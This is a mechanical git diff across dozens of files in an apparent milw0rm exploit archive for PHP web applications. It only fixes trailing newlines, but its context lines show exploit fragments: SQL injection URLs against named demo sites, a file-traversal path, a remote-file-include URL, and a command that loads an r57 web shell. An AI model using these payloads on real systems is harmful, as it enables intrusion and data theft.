milw0rm.com [2008-06-26] +# milw0rm.com [2008-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/5944.txt b/platforms/php/webapps/5944.txt index bf6a696eb..555efdd3e 100755 --- a/platforms/php/webapps/5944.txt +++ b/platforms/php/webapps/5944.txt @@ -72,4 +72,4 @@ SITE : cwh.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-26] +# milw0rm.com [2008-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/5945.txt b/platforms/php/webapps/5945.txt index 842e0bdfd..584b19916 100755 --- a/platforms/php/webapps/5945.txt +++ b/platforms/php/webapps/5945.txt @@ -114,4 +114,4 @@ while(1) ?> -# milw0rm.com [2008-06-26] +# milw0rm.com [2008-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/5946.txt b/platforms/php/webapps/5946.txt index b78a56bdc..82c786b09 100755 --- a/platforms/php/webapps/5946.txt +++ b/platforms/php/webapps/5946.txt @@ -65,4 +65,4 @@ <<->> All muslims -# milw0rm.com [2008-06-26] +# milw0rm.com [2008-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/5947.txt b/platforms/php/webapps/5947.txt index 9e295dce4..194ae6ca3 100755 --- a/platforms/php/webapps/5947.txt +++ b/platforms/php/webapps/5947.txt @@ -65,4 +65,4 @@ <<->> All muslims -# milw0rm.com [2008-06-26] +# milw0rm.com [2008-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/5948.txt b/platforms/php/webapps/5948.txt index 56baa237e..5a328e711 100755 --- a/platforms/php/webapps/5948.txt +++ b/platforms/php/webapps/5948.txt @@ -65,4 +65,4 @@ <<->> All muslims -# milw0rm.com [2008-06-26] +# milw0rm.com [2008-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/5949.txt b/platforms/php/webapps/5949.txt index f67aad34e..7e6f9b898 100755 --- a/platforms/php/webapps/5949.txt +++ b/platforms/php/webapps/5949.txt @@ -65,4 +65,4 @@ <<->> All muslims -# milw0rm.com [2008-06-26] +# milw0rm.com [2008-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/5950.txt b/platforms/php/webapps/5950.txt index 768454ac4..e038b6b16 100755 --- a/platforms/php/webapps/5950.txt +++ b/platforms/php/webapps/5950.txt @@ -65,4 +65,4 @@ <<->> All muslims -# milw0rm.com [2008-06-26] +# milw0rm.com [2008-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/5954.txt b/platforms/php/webapps/5954.txt index 0deab71d7..095ce725b 100755 --- a/platforms/php/webapps/5954.txt +++ b/platforms/php/webapps/5954.txt @@ -33,4 +33,4 @@ now you can get admin access and manage the cms ;) ------- young iranian h4ck3rz -# milw0rm.com [2008-06-26] +# milw0rm.com [2008-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/5955.txt b/platforms/php/webapps/5955.txt index e190ad42f..386796dc7 100755 --- a/platforms/php/webapps/5955.txt +++ b/platforms/php/webapps/5955.txt @@ -41,4 +41,4 @@ ####################################################################### -# milw0rm.com [2008-06-26] +# milw0rm.com [2008-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/5956.txt b/platforms/php/webapps/5956.txt index 000595003..3e2e96b36 100755 --- a/platforms/php/webapps/5956.txt +++ b/platforms/php/webapps/5956.txt @@ -12,4 +12,4 @@ | http://mesh.dl.sourceforge.net/sourceforge/kwa/kwa_0_94_pro.zip | @~~===============================================================~~@ -# milw0rm.com [2008-06-26] +# milw0rm.com [2008-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/5957.txt b/platforms/php/webapps/5957.txt index c32b54360..a2b86fc3d 100755 --- a/platforms/php/webapps/5957.txt +++ b/platforms/php/webapps/5957.txt @@ -91,4 +91,4 @@ SITE : cwh.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-27] +# milw0rm.com [2008-06-27] \ No newline at end of file diff --git a/platforms/php/webapps/5958.txt b/platforms/php/webapps/5958.txt index 66a968328..4527681e9 100755 --- a/platforms/php/webapps/5958.txt +++ b/platforms/php/webapps/5958.txt @@ -24,4 +24,4 @@ [XSS] --> -# milw0rm.com [2008-06-27] +# milw0rm.com [2008-06-27] \ No newline at end of file diff --git a/platforms/php/webapps/5959.txt b/platforms/php/webapps/5959.txt index c165d90e3..45b54c732 100755 --- a/platforms/php/webapps/5959.txt +++ b/platforms/php/webapps/5959.txt @@ -37,4 +37,4 @@ now visit /Admin and you can get admin access and manage the cms ;) ------- young iranian h4ck3rz -# milw0rm.com [2008-06-27] +# milw0rm.com [2008-06-27] \ No newline at end of file diff --git a/platforms/php/webapps/5960.txt b/platforms/php/webapps/5960.txt index 773bc9194..18c6d3d32 100755 --- a/platforms/php/webapps/5960.txt +++ b/platforms/php/webapps/5960.txt @@ -52,4 +52,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-06-27] +# milw0rm.com [2008-06-27] \ No newline at end of file diff --git a/platforms/php/webapps/5961.txt b/platforms/php/webapps/5961.txt index 17d01fb57..1a6a32f8a 100755 --- a/platforms/php/webapps/5961.txt +++ b/platforms/php/webapps/5961.txt @@ -30,4 +30,4 @@ www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid=-9999+u =United State of Albania = ########################################## -# milw0rm.com [2008-06-27] +# milw0rm.com [2008-06-27] \ No newline at end of file diff --git a/platforms/php/webapps/5963.txt b/platforms/php/webapps/5963.txt index 0a06b7dda..0a021d5be 100755 --- a/platforms/php/webapps/5963.txt +++ b/platforms/php/webapps/5963.txt @@ -21,4 +21,4 @@ [*] Greetings2: http://www.dz-secure.com http://palcastle.org/cc -# milw0rm.com [2008-06-28] +# milw0rm.com [2008-06-28] \ No newline at end of file diff --git a/platforms/php/webapps/5964.txt b/platforms/php/webapps/5964.txt index 05e424523..c1d2459b2 100755 --- a/platforms/php/webapps/5964.txt +++ b/platforms/php/webapps/5964.txt @@ -54,4 +54,4 @@ Login AdmiN : # # #################################(and All IRAQIs)############################### -# milw0rm.com [2008-06-28] +# milw0rm.com [2008-06-28] \ No newline at end of file diff --git a/platforms/php/webapps/5965.txt b/platforms/php/webapps/5965.txt index 5b17c07e9..7bdb9f327 100755 --- a/platforms/php/webapps/5965.txt +++ b/platforms/php/webapps/5965.txt @@ -18,4 +18,4 @@ [*] Greetings2: http://www.dz-secure.com http://palcastle.org/cc -# milw0rm.com [2008-06-28] +# milw0rm.com [2008-06-28] \ No newline at end of file diff --git a/platforms/php/webapps/5966.pl b/platforms/php/webapps/5966.pl index eff728b89..14d046d84 100755 --- a/platforms/php/webapps/5966.pl +++ b/platforms/php/webapps/5966.pl @@ -112,4 +112,4 @@ sub istrue2 } -# milw0rm.com [2008-06-28] +# milw0rm.com [2008-06-28] \ No newline at end of file diff --git a/platforms/php/webapps/5967.txt b/platforms/php/webapps/5967.txt index 7d0123c5b..dc7431fbb 100755 --- a/platforms/php/webapps/5967.txt +++ b/platforms/php/webapps/5967.txt @@ -65,4 +65,4 @@ LFI-vulnerability in the photo-gallery code in the CMS, # As always, Good luck and be safe. # -# milw0rm.com [2008-06-28] +# milw0rm.com [2008-06-28] \ No newline at end of file diff --git a/platforms/php/webapps/5969.txt b/platforms/php/webapps/5969.txt index c0832049a..6d1c5bd4e 100755 --- a/platforms/php/webapps/5969.txt +++ b/platforms/php/webapps/5969.txt @@ -29,4 +29,4 @@ ####################### ####################### -# milw0rm.com [2008-06-30] +# milw0rm.com [2008-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/5970.txt b/platforms/php/webapps/5970.txt index 42750de2a..9b0bebb2b 100755 --- a/platforms/php/webapps/5970.txt +++ b/platforms/php/webapps/5970.txt @@ -69,4 +69,4 @@ - `"S$$$$$$$$$$$$$$$$$#" $ `$ `$ - `"""""""""""""' ' ' ' -# milw0rm.com [2008-06-30] +# milw0rm.com [2008-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/5971.pl b/platforms/php/webapps/5971.pl index 1f99acac6..8ea71c463 100755 --- a/platforms/php/webapps/5971.pl +++ b/platforms/php/webapps/5971.pl @@ -119,4 +119,4 @@ else print "\n!!! Exploit Failed !!!\n"; } -# milw0rm.com [2008-06-30] +# milw0rm.com [2008-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/5972.txt b/platforms/php/webapps/5972.txt index 9146b924c..f94ab89c5 100755 --- a/platforms/php/webapps/5972.txt +++ b/platforms/php/webapps/5972.txt @@ -36,4 +36,4 @@ Greetz: dun - sid_psycho - Kacper - Str0ke ########################################################### -# milw0rm.com [2008-06-30] +# milw0rm.com [2008-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/5973.php b/platforms/php/webapps/5973.php index e41c2313b..c82b786b6 100755 --- a/platforms/php/webapps/5973.php +++ b/platforms/php/webapps/5973.php @@ -111,4 +111,4 @@ ?> -# milw0rm.com [2008-06-30] +# milw0rm.com [2008-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/5974.txt b/platforms/php/webapps/5974.txt index 15e369226..c6b956690 100755 --- a/platforms/php/webapps/5974.txt +++ b/platforms/php/webapps/5974.txt @@ -38,4 +38,4 @@ ####################### ####################### -# milw0rm.com [2008-06-30] +# milw0rm.com [2008-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/5975.txt b/platforms/php/webapps/5975.txt index 78a9e4dfa..af06bcaae 100755 --- a/platforms/php/webapps/5975.txt +++ b/platforms/php/webapps/5975.txt @@ -123,4 +123,4 @@ Jesper Jurcenoks Co-founder netVigilance, Inc www.netvigilance.com -# milw0rm.com [2008-06-30] +# milw0rm.com [2008-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/5976.pl b/platforms/php/webapps/5976.pl index 0ec4f45cf..3c7a5d38d 100755 --- a/platforms/php/webapps/5976.pl +++ b/platforms/php/webapps/5976.pl @@ -93,4 +93,4 @@ else { die "Gagal mengeksploitasi :p \n"; } -# milw0rm.com [2008-06-30] +# milw0rm.com [2008-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/5977.txt b/platforms/php/webapps/5977.txt index 048e0c1ea..e21846ea5 100755 --- a/platforms/php/webapps/5977.txt +++ b/platforms/php/webapps/5977.txt @@ -28,4 +28,4 @@ [!] Greetingz..: h0yt3r, k1tk4t, pwndomina, e\o, daneo -# milw0rm.com [2008-06-30] +# milw0rm.com [2008-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/5980.txt b/platforms/php/webapps/5980.txt index d75077d64..61f91c275 100755 --- a/platforms/php/webapps/5980.txt +++ b/platforms/php/webapps/5980.txt @@ -46,4 +46,4 @@ #&all muslim peoples all over the world :)# ########################################### -# milw0rm.com [2008-06-30] +# milw0rm.com [2008-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/5981.txt b/platforms/php/webapps/5981.txt index 38569d3aa..1177441b4 100755 --- a/platforms/php/webapps/5981.txt +++ b/platforms/php/webapps/5981.txt @@ -21,4 +21,4 @@ All Member Real Hack & All My Friends And All Muslims Hackers .. Real Hack Team ( R-H ) .. ################################################################################ -# milw0rm.com [2008-06-30] +# milw0rm.com [2008-06-30] \ No newline at end of file diff --git a/platforms/php/webapps/5982.txt b/platforms/php/webapps/5982.txt index 123593b4b..70dd5814c 100755 --- a/platforms/php/webapps/5982.txt +++ b/platforms/php/webapps/5982.txt @@ -12,4 +12,4 @@ | http://dfn.dl.sourceforge.net/sourceforge/php-agenda/php-agenda-2.2.4.tar.gz | @~~=============================================================================~~@ -# milw0rm.com [2008-07-01] +# milw0rm.com [2008-07-01] \ No newline at end of file diff --git a/platforms/php/webapps/5983.txt b/platforms/php/webapps/5983.txt index c5a30c6ef..de36696d7 100755 --- a/platforms/php/webapps/5983.txt +++ b/platforms/php/webapps/5983.txt @@ -12,4 +12,4 @@ | http://downloads.sourceforge.net/cat-2/CAT2-1_2.zip | @~~====================================================~~@ -# milw0rm.com [2008-07-01] +# milw0rm.com [2008-07-01] \ No newline at end of file diff --git a/platforms/php/webapps/5984.txt b/platforms/php/webapps/5984.txt index 0074f9b9d..ee2ed0856 100755 --- a/platforms/php/webapps/5984.txt +++ b/platforms/php/webapps/5984.txt @@ -56,4 +56,4 @@ $sql = mysql_query("SELECT parent FROM menu WHERE id = '$id'"); # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-07-01] +# milw0rm.com [2008-07-01] \ No newline at end of file diff --git a/platforms/php/webapps/5985.txt b/platforms/php/webapps/5985.txt index 2dc7d0bce..cc3b645e0 100755 --- a/platforms/php/webapps/5985.txt +++ b/platforms/php/webapps/5985.txt @@ -60,4 +60,4 @@ SITE : cwh.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-07-01] +# milw0rm.com [2008-07-01] \ No newline at end of file diff --git a/platforms/php/webapps/5986.php b/platforms/php/webapps/5986.php index 849cf4c60..16aeffe2f 100755 --- a/platforms/php/webapps/5986.php +++ b/platforms/php/webapps/5986.php @@ -1261,4 +1261,4 @@ class phpsploit ?> -# milw0rm.com [2008-07-01] +# milw0rm.com [2008-07-01] \ No newline at end of file diff --git a/platforms/php/webapps/5987.txt b/platforms/php/webapps/5987.txt index d4d9bc524..d00df3e04 100755 --- a/platforms/php/webapps/5987.txt +++ b/platforms/php/webapps/5987.txt @@ -45,4 +45,4 @@ http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+aya http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+eng http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+tr -# milw0rm.com [2008-07-01] +# milw0rm.com [2008-07-01] \ No newline at end of file diff --git a/platforms/php/webapps/5988.txt b/platforms/php/webapps/5988.txt index aa409083a..04c5f6be3 100755 --- a/platforms/php/webapps/5988.txt +++ b/platforms/php/webapps/5988.txt @@ -50,4 +50,4 @@ http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+S @@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@(and All IRAQIs)@@@@@@@@@@@@@@@@@@@@ -# milw0rm.com [2008-07-01] +# milw0rm.com [2008-07-01] \ No newline at end of file diff --git a/platforms/php/webapps/5989.txt b/platforms/php/webapps/5989.txt index b25547d00..87aeeff02 100755 --- a/platforms/php/webapps/5989.txt +++ b/platforms/php/webapps/5989.txt @@ -46,4 +46,4 @@ This component is released under the GNU/GPL License. www.joomprod.com 1.0.2 -# milw0rm.com [2008-07-01] +# milw0rm.com [2008-07-01] \ No newline at end of file diff --git a/platforms/php/webapps/5990.txt b/platforms/php/webapps/5990.txt index 8dd68a880..ac3d91f4f 100755 --- a/platforms/php/webapps/5990.txt +++ b/platforms/php/webapps/5990.txt @@ -17,4 +17,4 @@ index.php?option=com_mygallery&func=viewcategory&cid=-1%20union%20select%201,2,u ## GREETZ : CoNaN & Islam security Team & Mr l3frite & Mounita20 and all musulmans hackers -# milw0rm.com [2008-07-01] +# milw0rm.com [2008-07-01] \ No newline at end of file diff --git a/platforms/php/webapps/5991.txt b/platforms/php/webapps/5991.txt index c08015a58..6123406be 100755 --- a/platforms/php/webapps/5991.txt +++ b/platforms/php/webapps/5991.txt @@ -30,4 +30,4 @@ ####################### ####################### -# milw0rm.com [2008-07-02] +# milw0rm.com [2008-07-02] \ No newline at end of file diff --git a/platforms/php/webapps/5992.txt b/platforms/php/webapps/5992.txt index 1cc78673e..c1dbfd1e3 100755 --- a/platforms/php/webapps/5992.txt +++ b/platforms/php/webapps/5992.txt @@ -63,4 +63,4 @@ SITE : cwh.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-07-02] +# milw0rm.com [2008-07-02] \ No newline at end of file diff --git a/platforms/php/webapps/5993.txt b/platforms/php/webapps/5993.txt index f8d897ce3..577d4a1de 100755 --- a/platforms/php/webapps/5993.txt +++ b/platforms/php/webapps/5993.txt @@ -19,4 +19,4 @@ [*] Greetings2: http://www.dz-secure.com http://palcastle.org/cc -# milw0rm.com [2008-07-02] +# milw0rm.com [2008-07-02] \ No newline at end of file diff --git a/platforms/php/webapps/5994.pl b/platforms/php/webapps/5994.pl index ce5bcb1d4..deb57eb06 100755 --- a/platforms/php/webapps/5994.pl +++ b/platforms/php/webapps/5994.pl @@ -60,4 +60,4 @@ else{print "\n[-] Exploit Failed...\n"; # codec by Houssamix From H-T Team -# milw0rm.com [2008-07-02] +# milw0rm.com [2008-07-02] \ No newline at end of file diff --git a/platforms/php/webapps/5995.pl b/platforms/php/webapps/5995.pl index 53853d236..b1ff0e7c0 100755 --- a/platforms/php/webapps/5995.pl +++ b/platforms/php/webapps/5995.pl @@ -61,4 +61,4 @@ else{print "\n[-] Exploit Failed...\n"; # codec by Houssamix From H-T Team -# milw0rm.com [2008-07-02] +# milw0rm.com [2008-07-02] \ No newline at end of file diff --git a/platforms/php/webapps/5996.txt b/platforms/php/webapps/5996.txt index d708dcf78..a907d4c84 100755 --- a/platforms/php/webapps/5996.txt +++ b/platforms/php/webapps/5996.txt @@ -116,4 +116,4 @@ perl phportal.pl http://localhost/include http://localhost/r57.php cmd -r -p exit(); } -# milw0rm.com [2008-07-02] +# milw0rm.com [2008-07-02] \ No newline at end of file diff --git a/platforms/php/webapps/5997.pl b/platforms/php/webapps/5997.pl index 4aeeb4a96..6280c5e73 100755 --- a/platforms/php/webapps/5997.pl +++ b/platforms/php/webapps/5997.pl @@ -60,4 +60,4 @@ sub inject_test { } else { print "\nTarget Site Not Vulnerable! Exiting..\n"; exit; } } -# milw0rm.com [2008-07-03] +# milw0rm.com [2008-07-03] \ No newline at end of file diff --git a/platforms/php/webapps/5998.txt b/platforms/php/webapps/5998.txt index 7b6e3c878..9f4f7d5b2 100755 --- a/platforms/php/webapps/5998.txt +++ b/platforms/php/webapps/5998.txt @@ -31,4 +31,4 @@ select * from berita where status='tampil' and kode_kategori=null UNION ALL SELE The comment renders the rest of the query to be useless. We are effectively grabbing the first user from the table "user", which is the admin. You can inject the other strings with server variables and attempt to fetch mysql.user hashes, if the conditions apply. -# milw0rm.com [2008-07-03] +# milw0rm.com [2008-07-03] \ No newline at end of file diff --git a/platforms/php/webapps/5999.txt b/platforms/php/webapps/5999.txt index 8c14f423b..fcbf98236 100755 --- a/platforms/php/webapps/5999.txt +++ b/platforms/php/webapps/5999.txt @@ -26,4 +26,4 @@ http://site.com/phpwebnews-mysql/bukutamu.php?det=-1/**/union/**/select/**/1,2,u Young Iranian h4ck3rz ================================================================================= -# milw0rm.com [2008-07-03] +# milw0rm.com [2008-07-03] \ No newline at end of file diff --git a/platforms/php/webapps/6.php b/platforms/php/webapps/6.php index f51594060..861fff1b9 100755 --- a/platforms/php/webapps/6.php +++ b/platforms/php/webapps/6.php @@ -337,4 +337,4 @@ else } ?> -# milw0rm.com [2006-05-25] +# milw0rm.com [2006-05-25] \ No newline at end of file diff --git a/platforms/php/webapps/6001.txt b/platforms/php/webapps/6001.txt index 2ff232bd8..8540995ac 100755 --- a/platforms/php/webapps/6001.txt +++ b/platforms/php/webapps/6001.txt @@ -333,4 +333,4 @@ Digital Security is leading IT security company in Russia, providing information Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -# milw0rm.com [2008-07-04] +# milw0rm.com [2008-07-04] \ No newline at end of file diff --git a/platforms/php/webapps/6002.pl b/platforms/php/webapps/6002.pl index e8bee6969..926162c9f 100755 --- a/platforms/php/webapps/6002.pl +++ b/platforms/php/webapps/6002.pl @@ -62,4 +62,4 @@ else{print "\n[-] Exploit Failed...\n"; # coded by Houssamix From H-T Team -# milw0rm.com [2008-07-04] +# milw0rm.com [2008-07-04] \ No newline at end of file diff --git a/platforms/php/webapps/6003.txt b/platforms/php/webapps/6003.txt index f0e61708a..16f3742d8 100755 --- a/platforms/php/webapps/6003.txt +++ b/platforms/php/webapps/6003.txt @@ -29,4 +29,4 @@ side note: 1.4.1 Final Database Query is a Joomla query manager. -# milw0rm.com [2008-07-04] +# milw0rm.com [2008-07-04] \ No newline at end of file diff --git a/platforms/php/webapps/6005.php b/platforms/php/webapps/6005.php index 424ab0782..aa7a43ee5 100755 --- a/platforms/php/webapps/6005.php +++ b/platforms/php/webapps/6005.php @@ -191,4 +191,4 @@ while(1) ?> -# milw0rm.com [2008-07-04] +# milw0rm.com [2008-07-04] \ No newline at end of file diff --git a/platforms/php/webapps/6006.php b/platforms/php/webapps/6006.php index af4ddde33..1b8d54bc9 100755 --- a/platforms/php/webapps/6006.php +++ b/platforms/php/webapps/6006.php @@ -809,4 +809,4 @@ class phpsploit ?> -# milw0rm.com [2008-07-05] +# milw0rm.com [2008-07-05] \ No newline at end of file diff --git a/platforms/php/webapps/6007.txt b/platforms/php/webapps/6007.txt index c787dfa26..637a7fe64 100755 --- a/platforms/php/webapps/6007.txt +++ b/platforms/php/webapps/6007.txt @@ -12,4 +12,4 @@ LFI : http://127.0.0.1/index.php?module=phpManual&file=../../../../../../../../. Xss : http://127.0.0.1/http://www.kasseler-cms.net/index.php?module=Files&do=Category&cid=[XSS] -# milw0rm.com [2008-07-05] +# milw0rm.com [2008-07-05] \ No newline at end of file diff --git a/platforms/php/webapps/6008.php b/platforms/php/webapps/6008.php index c9225fc54..f28735d99 100755 --- a/platforms/php/webapps/6008.php +++ b/platforms/php/webapps/6008.php @@ -123,4 +123,4 @@ else } ?> -# milw0rm.com [2008-07-05] +# milw0rm.com [2008-07-05] \ No newline at end of file diff --git a/platforms/php/webapps/6009.pl b/platforms/php/webapps/6009.pl index d7972559c..394f27afa 100755 --- a/platforms/php/webapps/6009.pl +++ b/platforms/php/webapps/6009.pl @@ -103,4 +103,4 @@ sub exploit { } } -# milw0rm.com [2008-07-05] +# milw0rm.com [2008-07-05] \ No newline at end of file diff --git a/platforms/php/webapps/6010.txt b/platforms/php/webapps/6010.txt index 5434f14d6..7c1c7007f 100755 --- a/platforms/php/webapps/6010.txt +++ b/platforms/php/webapps/6010.txt @@ -22,4 +22,4 @@ http://demo.xpoze.org/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 ###################### *Thanks to str0ke :X -# milw0rm.com [2008-07-06] +# milw0rm.com [2008-07-06] \ No newline at end of file diff --git a/platforms/php/webapps/6011.txt b/platforms/php/webapps/6011.txt index 696297d44..81cfd1f91 100755 --- a/platforms/php/webapps/6011.txt +++ b/platforms/php/webapps/6011.txt @@ -55,4 +55,4 @@ SITE : cwh.citec.us Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos ################################################################## -# milw0rm.com [2008-07-06] +# milw0rm.com [2008-07-06] \ No newline at end of file diff --git a/platforms/php/webapps/6014.txt b/platforms/php/webapps/6014.txt index 068b547fd..77598baa2 100755 --- a/platforms/php/webapps/6014.txt +++ b/platforms/php/webapps/6014.txt @@ -13,4 +13,4 @@ --------------------------------------- greetz Hamtaro aka CorVu5 -# milw0rm.com [2008-07-07] +# milw0rm.com [2008-07-07] \ No newline at end of file diff --git a/platforms/php/webapps/6015.txt b/platforms/php/webapps/6015.txt index 274789e0f..2edad8bb7 100755 --- a/platforms/php/webapps/6015.txt +++ b/platforms/php/webapps/6015.txt @@ -69,4 +69,4 @@ EVIL SHELL SCRIPT Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos ################################################################## -# milw0rm.com [2008-07-07] +# milw0rm.com [2008-07-07] \ No newline at end of file diff --git a/platforms/php/webapps/6016.pl b/platforms/php/webapps/6016.pl index 6b5cc2944..0bddd9582 100755 --- a/platforms/php/webapps/6016.pl +++ b/platforms/php/webapps/6016.pl @@ -42,4 +42,4 @@ use LWP::UserAgent; print " -------------------------------------------------\n"; } -# milw0rm.com [2008-07-07] +# milw0rm.com [2008-07-07] \ No newline at end of file diff --git a/platforms/php/webapps/6017.pl b/platforms/php/webapps/6017.pl index d049fc3e0..a0ae49814 100755 --- a/platforms/php/webapps/6017.pl +++ b/platforms/php/webapps/6017.pl @@ -119,4 +119,4 @@ sub check_char return $res->is_success; } -# milw0rm.com [2008-07-07] +# milw0rm.com [2008-07-07] \ No newline at end of file diff --git a/platforms/php/webapps/6018.pl b/platforms/php/webapps/6018.pl index 889cbe8b0..2c71d7006 100755 --- a/platforms/php/webapps/6018.pl +++ b/platforms/php/webapps/6018.pl @@ -177,4 +177,4 @@ sub send_surprise(){ } } -# milw0rm.com [2008-07-07] +# milw0rm.com [2008-07-07] \ No newline at end of file diff --git a/platforms/php/webapps/6019.pl b/platforms/php/webapps/6019.pl index 8eceefb18..a035fae76 100755 --- a/platforms/php/webapps/6019.pl +++ b/platforms/php/webapps/6019.pl @@ -207,4 +207,4 @@ sub _IS_VULN __END__ -# milw0rm.com [2008-07-07] +# milw0rm.com [2008-07-07] \ No newline at end of file diff --git a/platforms/php/webapps/6021.txt b/platforms/php/webapps/6021.txt index 410f8898d..324d6e0b8 100755 --- a/platforms/php/webapps/6021.txt +++ b/platforms/php/webapps/6021.txt @@ -52,4 +52,4 @@ -[*]+ Mole Group Hotel Script 1.0 Remote SQL Injection Vulnerability +[*]- -[*]+================================================================================+[*]- -# milw0rm.com [2008-07-08] +# milw0rm.com [2008-07-08] \ No newline at end of file diff --git a/platforms/php/webapps/6022.txt b/platforms/php/webapps/6022.txt index 155cf8a93..1e6bb6717 100755 --- a/platforms/php/webapps/6022.txt +++ b/platforms/php/webapps/6022.txt @@ -55,4 +55,4 @@ -[*]+ Real Estate Script <= 1.1 Remote SQL Injection Vulnerability +[*]- -[*]+================================================================================+[*]- -# milw0rm.com [2008-07-08] +# milw0rm.com [2008-07-08] \ No newline at end of file diff --git a/platforms/php/webapps/6023.pl b/platforms/php/webapps/6023.pl index 9ef9720bf..154063660 100755 --- a/platforms/php/webapps/6023.pl +++ b/platforms/php/webapps/6023.pl @@ -125,4 +125,4 @@ else exit(); } -# milw0rm.com [2008-07-08] +# milw0rm.com [2008-07-08] \ No newline at end of file diff --git a/platforms/php/webapps/6024.txt b/platforms/php/webapps/6024.txt index a687dc9de..5a0bab966 100755 --- a/platforms/php/webapps/6024.txt +++ b/platforms/php/webapps/6024.txt @@ -30,4 +30,4 @@ http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/ray/modules/global/inc/content.inc.php? # bEST wISHES -# milw0rm.com [2008-07-08] +# milw0rm.com [2008-07-08] \ No newline at end of file diff --git a/platforms/php/webapps/6025.txt b/platforms/php/webapps/6025.txt index 25ed140d4..9bdb0a2d7 100755 --- a/platforms/php/webapps/6025.txt +++ b/platforms/php/webapps/6025.txt @@ -28,4 +28,4 @@ side note: www.joomla.org 1.0.0 -# milw0rm.com [2008-07-08] +# milw0rm.com [2008-07-08] \ No newline at end of file diff --git a/platforms/php/webapps/6027.txt b/platforms/php/webapps/6027.txt index e78169164..d7330a9de 100755 --- a/platforms/php/webapps/6027.txt +++ b/platforms/php/webapps/6027.txt @@ -55,4 +55,4 @@ -[*]+ Last Minute Script <= 4.0 Remote SQL Injection Vulnerability +[*]- -[*]+================================================================================+[*]- -# milw0rm.com [2008-07-08] +# milw0rm.com [2008-07-08] \ No newline at end of file diff --git a/platforms/php/webapps/6028.txt b/platforms/php/webapps/6028.txt index 777eb55f5..187df7b53 100755 --- a/platforms/php/webapps/6028.txt +++ b/platforms/php/webapps/6028.txt @@ -22,4 +22,4 @@ http://WwW.4RxH.CoM/ray.3.5/modules/global/inc/content.inc.php?sIncPath=http://r # bEST wISHES -# milw0rm.com [2008-07-08] +# milw0rm.com [2008-07-08] \ No newline at end of file diff --git a/platforms/php/webapps/6033.pl b/platforms/php/webapps/6033.pl index 1690921c2..39e0221ca 100755 --- a/platforms/php/webapps/6033.pl +++ b/platforms/php/webapps/6033.pl @@ -106,4 +106,4 @@ $hasil = $browser->post($arbitrary,["judul"=>$isijudul,"konten"=>$isikonten],); $konten = $hasil->content; print $konten ; -# milw0rm.com [2008-07-09] +# milw0rm.com [2008-07-09] \ No newline at end of file diff --git a/platforms/php/webapps/6034.txt b/platforms/php/webapps/6034.txt index c567760be..a26126ca1 100755 --- a/platforms/php/webapps/6034.txt +++ b/platforms/php/webapps/6034.txt @@ -40,4 +40,4 @@ Admin Login : Im IRAQi -# milw0rm.com [2008-07-09] +# milw0rm.com [2008-07-09] \ No newline at end of file diff --git a/platforms/php/webapps/6035.txt b/platforms/php/webapps/6035.txt index 62d0a71fd..815227c03 100755 --- a/platforms/php/webapps/6035.txt +++ b/platforms/php/webapps/6035.txt @@ -47,4 +47,4 @@ Admin Login : Im IRAQi -# milw0rm.com [2008-07-10] +# milw0rm.com [2008-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/6036.txt b/platforms/php/webapps/6036.txt index 5edd7ff73..859e5d8e2 100755 --- a/platforms/php/webapps/6036.txt +++ b/platforms/php/webapps/6036.txt @@ -19,4 +19,4 @@ All Member Real Hack And All My Friends .. Real Hack Team ( R-H ) .. ###################################################################################################### -# milw0rm.com [2008-07-10] +# milw0rm.com [2008-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/6037.txt b/platforms/php/webapps/6037.txt index b579306ed..3d192ed1f 100755 --- a/platforms/php/webapps/6037.txt +++ b/platforms/php/webapps/6037.txt @@ -19,4 +19,4 @@ # ########################################################## -# milw0rm.com [2008-07-10] +# milw0rm.com [2008-07-10] \ No newline at end of file diff --git a/platforms/php/webapps/6040.txt b/platforms/php/webapps/6040.txt index d1d0bdc10..dd61ce424 100755 --- a/platforms/php/webapps/6040.txt +++ b/platforms/php/webapps/6040.txt @@ 